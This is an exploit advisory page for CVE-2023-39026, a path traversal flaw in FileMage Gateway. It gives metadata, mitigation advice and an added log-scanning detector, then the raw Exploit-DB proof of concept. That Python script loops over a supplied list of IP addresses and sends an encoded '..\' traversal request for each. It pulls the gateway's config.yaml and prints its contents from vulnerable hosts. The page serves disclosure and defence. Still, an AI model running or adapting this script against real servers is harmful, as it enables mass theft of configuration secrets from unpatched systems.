Vendor: FileMage Gateway
By: Bryce "Raindayzz" Harty
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: FileMage Gateway
Affected Version From: Azure Versions < 1.10.9
Affected Version To: 1.10.2009
Patch Exists: YES
Related CVE: CVE-2023-39026
CPE: cpe:2.3:a:filemage:gateway:1.10.9
Tags: cve,cve2023,lfi,filemage
Nuclei Metadata: {'max-request': 1, 'verified': True, 'shodan-query': 'title:"FileMage"'}
Platforms Tested: All Azure deployments < 1.10.9
2023

FileMage Gateway 1.10.9 – Local File Inclusion

FileMage Gateway is vulnerable to local file inclusion in Azure versions before 1.10.9. An attacker can exploit this vulnerability to include arbitrary files from the server, potentially leading to remote code execution.

Mitigation:

Update to FileMage Gateway version 1.10.9 or later. Restrict access to the vulnerable endpoint and sanitize user input to prevent directory traversal attacks.
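
One way to check proxy or load-balancer access logs for the traversal request used in the proof of concept on this page. This is an added example, not code from the advisory or from FileMage; the Common Log Format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

MGMT_PREFIX = "/mgmnt/"  # management prefix seen in the request path on this page
# Assumed log format: Common Log Format from a proxy in front of the gateway.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2023:10:00:01 +0000] "GET /mgmnt/login HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Aug/2023:10:00:02 +0000] "GET /mgmnt/..%5c..%5c..%5c'
    'programdata%5cfilemage%5cgateway%5cconfig.yaml HTTP/1.1" 200 2048',
    '198.51.100.7 - - [22/Aug/2023:10:00:03 +0000] "GET /mgmnt/..%5C..%5C'
    'programdata%5Cfilemage%5Cgateway%5Cconfig.yaml HTTP/1.1" 404 0',
    '192.0.2.11 - - [22/Aug/2023:10:00:04 +0000] "GET /mgmnt/static/app..v2.js HTTP/1.1" 200 900',
]


def normalize(path, max_rounds=3):
    """Percent-decode until stable, then treat '\\' like '/' as Windows does."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def is_traversal(raw_path):
    """True if a request under MGMT_PREFIX carries a '..' path segment."""
    path = normalize(raw_path.split("?", 1)[0])
    return path.startswith(MGMT_PREFIX) and ".." in path[len(MGMT_PREFIX):].split("/")


def suspicious_requests(lines):
    """Return (client, status, served) for each traversal attempt in the log."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if m and is_traversal(m.group(3)):
            client, status = m.group(1), int(m.group(4))
            # A 2xx answer means the file was probably returned: treat as exposure.
            hits.append((client, status, 200 <= status < 300))
    return hits


if __name__ == "__main__":
    for client, status, served in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} {'FILE SERVED' if served else 'blocked/not found'}")
```

A hit with a 2xx status on a deployment older than 1.10.9 means config.yaml was likely disclosed, so any secrets it holds should be rotated after updating.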

Exploit-DB raw data:

# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty   
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9 
# CVE : CVE-2023-39026

# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html

import requests
import warnings
warnings.filterwarnings("ignore")
def worker(url):
    response = requests.get(url, verify=False, timeout=.5)
    return response
def main():
    listIP = []
    file_path = input("Enter the path to the file containing the IP addresses: ")
    with open(file_path, 'r') as file:
        ip_list = file.read().splitlines()
        searchString = "tls"
        for ip in ip_list:
            url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
            try:
                response = worker(url)
                #print(response.text)
                if searchString in response.text:
                    print("Vulnerable IP: " + ip)
                    print(response.text)
                    listIP.append(ip)
            except requests.exceptions.RequestException as e:  
                print(f"Error occurred for {ip}: {str(e)}")

    for x in listIP:
        print(x)
if __name__ == '__main__':
    main()